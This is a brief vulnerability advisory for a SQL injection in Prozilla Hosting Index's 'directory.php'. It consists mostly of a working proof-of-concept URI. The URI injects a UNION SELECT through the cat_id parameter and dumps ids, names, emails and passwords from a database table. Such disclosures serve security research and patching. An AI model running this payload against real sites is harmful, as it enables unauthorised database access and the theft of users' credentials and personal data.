Prozilla Hosting Index 'directory.php' SQL Injection Vulnerability

Prozilla Hosting Index 'directory.php' SQL Injection Vulnerability

An attacker can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/directory.php?ax=list&sub=7&cat_id=-1%20union%20select%201,2,concat(id,0x3a,name,0x3a,email,0x3a,password),4,5,6,7,8,9,10,11,12,13,14%20from%20links-